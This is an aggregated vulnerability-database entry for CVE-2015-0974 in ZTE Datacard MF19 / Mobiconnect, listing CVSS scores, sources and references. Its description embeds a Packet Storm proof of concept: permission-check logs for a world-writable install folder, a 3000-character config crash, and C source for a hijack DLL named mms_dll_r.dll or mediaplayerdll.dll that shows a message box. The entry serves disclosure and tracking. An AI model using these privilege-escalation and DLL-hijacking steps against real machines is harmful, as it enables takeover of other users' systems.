ID

VAR-201708-0225


CVE

CVE-2015-0974


TITLE

ZTE MF19 Multiple Security Vulnerabilities

Trust: 0.9

sources: BID: 71892 // CNNVD: CNNVD-201501-147

DESCRIPTION

Untrusted search path vulnerability in ZTE Datacard MF19 0V1.0.0B04 allows local users to gain privilege by modifying the 'Ucell Internet' directory to reference a malicious mms_dll_r.dll or mediaplayerdll.dll. ZTE Datacard Contains an untrusted search path vulnerability.None. ZTE MF19 has multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to escalate permissions, execute arbitrary code, and perform denial of service attacks. ZTE MF19 is a China Unicom 3G wireless internet card from ZTE Corporation. The following vulnerabilities exist in ZTE MF19: 1. Arbitrary code execution vulnerability 2. Local privilege escalation vulnerability 3. Local denial of service vulnerability. Attackers can use the specially crafted Dynamic Link Library (DLL) files to exploit these vulnerabilities to gain elevated permissions, crash affected devices, and deny service to legitimate users. Vulnerabilities exist in ZTE MF19 using 0V1.0.0B04 firmware, other versions may also be affected. /* * Exploit Title:ZTE Datacard MF19 0V1.0.0B04 (PCW_MOBILISALGV1.0.0B03 mobilis ) Insecure Permissions Local Privilege Escalation & PoC Local crash & DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll) * Date: 1/01/2015 * Author: Hadji Samir s-dz@hotmail.fr * Link soft:http://www.3g.dz/fr/cle_mas/index.php?id_document=2 * Vendor: http://www.zte.com.cn/ http://www.mobilis.dz/entreprises/mobiconnect.php * Tested on: windows 7 FR * Thanks Anna ############################# Insecure Permissions Local Privilege Escalation ################################################ Technical Details & Description: ================================ A local privilege escalation vulnerability has been discovered in the official ZTE Datacard mobiconnect application software. The application is vulnerable to an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the `F` flag (full) for the `Everyone`(Tout le monde:F) and `Users` group, for the all binary file. The files are installed in the `Ucell Internet` directory which has the Everyone group assigned to it with full permissions making every single file inside vulnerable to change by any user on the affected machine. After you replace the binary with your rootkit, on reboot you get SYSTEM privileges. Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers with restricted account privileges and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- PoC Session Logs --- C:\Users\s-dz\Desktop>accesschk.exe -dqv "C:\Program Files\Mobiconnect" C:\Program Files\Mobiconnect Medium Mandatory Level (Default) [No-Write-Up] RW Tout le monde FILE_ALL_ACCESS RW NT SERVICE\TrustedInstaller FILE_ALL_ACCESS RW AUTORITE NT\Syst\xdeme FILE_ALL_ACCESS RW BUILTIN\Administrateurs FILE_ALL_ACCESS R BUILTIN\Utilisateurs FILE_LIST_DIRECTORY FILE_READ_ATTRIBUTES FILE_READ_EA FILE_TRAVERSE SYNCHRONIZE READ_CONTROL C:\Users\s-dz\Desktop> C:\Program Files>icacls "Mobiconnect" Mobiconnect Tout le monde:(F) Tout le monde:(OI)(CI)(IO)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) AUTORITE NT\Syst\xe8me:(I)(F) AUTORITE NT\Syst\xe8me:(I)(OI)(CI)(IO)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Administrateurs:(I)(OI)(CI)(IO)(F) BUILTIN\Utilisateurs:(I)(RX) BUILTIN\Utilisateurs:(I)(OI)(CI)(IO)(GR,GE) CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F) 1 fichiers correctement trait\xe9s\xa0; \xe9chec du traitement de 0 fichiers 2- ########################### PoC Local crash ########################################################## first go to C:\program files\Internet Mobile\etworkCfg.xml (Network configuration) and write "A" * 3000 in <ConfigFileName>"A" x 3000</ConfigFileName> . Save it open the program . poc will crash ........... ########################################################################################################## 3-########################DLL Hijacking Exploit (mms_dll_r.dll, mediaplayerdll.dll)####################### */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "ZTE DLL Hijacked\Hadji Samir", "POC", MB_OK); }

Trust: 3.69

sources: NVD: CVE-2015-0974 // JVNDB: JVNDB-2015-007864 // CNVD: CNVD-2017-28575 // CNVD: CNVD-2015-00289 // CNNVD: CNNVD-201501-147 // BID: 71892 // VULMON: CVE-2015-0974 // PACKETSTORM: 129808

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 1.2

sources: CNVD: CNVD-2017-28575 // CNVD: CNVD-2015-00289

AFFECTED PRODUCTS

vendor:mobilismodel:mobiconnectscope:eqversion:1.0.0b03

Trust: 1.6

vendor:ztemodel:mf19 0v1.0.0b04scope: - version: -

Trust: 0.9

vendor:atm mobilismodel:mobiconnectscope: - version: -

Trust: 0.8

vendor:ztemodel:datacard mf190 1.0.0b04scope: - version: -

Trust: 0.6

sources: CNVD: CNVD-2017-28575 // CNVD: CNVD-2015-00289 // BID: 71892 // JVNDB: JVNDB-2015-007864 // CNNVD: CNNVD-201708-1187 // NVD: CVE-2015-0974

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-0974
value: HIGH

Trust: 1.0

NVD: CVE-2015-0974
value: HIGH

Trust: 0.8

CNVD: CNVD-2017-28575
value: HIGH

Trust: 0.6

CNVD: CNVD-2015-00289
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201708-1187
value: HIGH

Trust: 0.6

VULMON: CVE-2015-0974
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2015-0974
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2017-28575
severity: HIGH
baseScore: 7.2
vectorString: AV:L/AC:L/AU:N/C:C/I:C/A:C
accessVector: LOCAL
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 3.9
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

CNVD: CNVD-2015-00289
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

nvd@nist.gov: CVE-2015-0974
baseSeverity: HIGH
baseScore: 7.8
vectorString: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector: LOCAL
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.8
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2017-28575 // CNVD: CNVD-2015-00289 // VULMON: CVE-2015-0974 // JVNDB: JVNDB-2015-007864 // CNNVD: CNNVD-201708-1187 // NVD: CVE-2015-0974

PROBLEMTYPE DATA

problemtype:CWE-426

Trust: 1.8

sources: JVNDB: JVNDB-2015-007864 // NVD: CVE-2015-0974

THREAT TYPE

local

Trust: 1.5

sources: BID: 71892 // CNNVD: CNNVD-201501-147 // CNNVD: CNNVD-201708-1187

TYPE

lack of information

Trust: 0.6

sources: CNNVD: CNNVD-201708-1187

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-007864

PATCH

title:MobiConnecturl:http://www.mobilis.dz/entreprises/mobiconnect.php

Trust: 0.8

title:Top Pageurl:http://www.zte.com.cn/global/

Trust: 0.8

sources: JVNDB: JVNDB-2015-007864

EXTERNAL IDS

db:PACKETSTORMid:129808

Trust: 3.8

db:NVDid:CVE-2015-0974

Trust: 3.2

db:BIDid:71892

Trust: 1.5

db:JVNDBid:JVNDB-2015-007864

Trust: 0.8

db:CNVDid:CNVD-2017-28575

Trust: 0.6

db:CNVDid:CNVD-2015-00289

Trust: 0.6

db:CNNVDid:CNNVD-201501-147

Trust: 0.6

db:CNNVDid:CNNVD-201708-1187

Trust: 0.6

db:VULMONid:CVE-2015-0974

Trust: 0.1

sources: CNVD: CNVD-2017-28575 // CNVD: CNVD-2015-00289 // VULMON: CVE-2015-0974 // BID: 71892 // JVNDB: JVNDB-2015-007864 // PACKETSTORM: 129808 // CNNVD: CNNVD-201501-147 // CNNVD: CNNVD-201708-1187 // NVD: CVE-2015-0974

REFERENCES

url:http://packetstormsecurity.com/files/129808/zte-datacard-mf19-privilege-escalation-dll-hijacking.html

Trust: 3.1

url:https://nvd.nist.gov/vuln/detail/cve-2015-0974

Trust: 0.9

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0974

Trust: 0.8

url:http://packetstormsecurity.com/files/129808/ztedatacard-privescdllhijack.txt

Trust: 0.6

url:http://www.securityfocus.com/bid/71892

Trust: 0.6

url:http://wwwen.zte.com.cn/en/

Trust: 0.3

url:https://cwe.mitre.org/data/definitions/426.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:http://www.3g.dz/fr/cle_mas/index.php?id_document=2

Trust: 0.1

url:http://www.zte.com.cn/

Trust: 0.1

url:http://www.mobilis.dz/entreprises/mobiconnect.php

Trust: 0.1

sources: CNVD: CNVD-2017-28575 // CNVD: CNVD-2015-00289 // VULMON: CVE-2015-0974 // BID: 71892 // JVNDB: JVNDB-2015-007864 // PACKETSTORM: 129808 // CNNVD: CNNVD-201501-147 // CNNVD: CNNVD-201708-1187 // NVD: CVE-2015-0974

CREDITS

hadji samir

Trust: 1.0

sources: BID: 71892 // PACKETSTORM: 129808 // CNNVD: CNNVD-201501-147

SOURCES

db:CNVDid:CNVD-2017-28575
db:CNVDid:CNVD-2015-00289
db:VULMONid:CVE-2015-0974
db:BIDid:71892
db:JVNDBid:JVNDB-2015-007864
db:PACKETSTORMid:129808
db:CNNVDid:CNNVD-201501-147
db:CNNVDid:CNNVD-201708-1187
db:NVDid:CVE-2015-0974

LAST UPDATE DATE

2025-04-20T23:32:10.723000+00:00


SOURCES UPDATE DATE

db:CNVDid:CNVD-2017-28575date:2017-09-28T00:00:00
db:CNVDid:CNVD-2015-00289date:2015-01-14T00:00:00
db:VULMONid:CVE-2015-0974date:2017-09-12T00:00:00
db:BIDid:71892date:2015-01-01T00:00:00
db:JVNDBid:JVNDB-2015-007864date:2017-10-02T00:00:00
db:CNNVDid:CNNVD-201501-147date:2015-01-08T00:00:00
db:CNNVDid:CNNVD-201708-1187date:2017-08-29T00:00:00
db:NVDid:CVE-2015-0974date:2025-04-20T01:37:25.860

SOURCES RELEASE DATE

db:CNVDid:CNVD-2017-28575date:2017-09-27T00:00:00
db:CNVDid:CNVD-2015-00289date:2015-01-14T00:00:00
db:VULMONid:CVE-2015-0974date:2017-08-28T00:00:00
db:BIDid:71892date:2015-01-01T00:00:00
db:JVNDBid:JVNDB-2015-007864date:2017-10-02T00:00:00
db:PACKETSTORMid:129808date:2015-01-05T03:33:33
db:CNNVDid:CNNVD-201501-147date:2015-01-08T00:00:00
db:CNNVDid:CNNVD-201708-1187date:2017-08-29T00:00:00
db:NVDid:CVE-2015-0974date:2017-08-28T15:29:01.063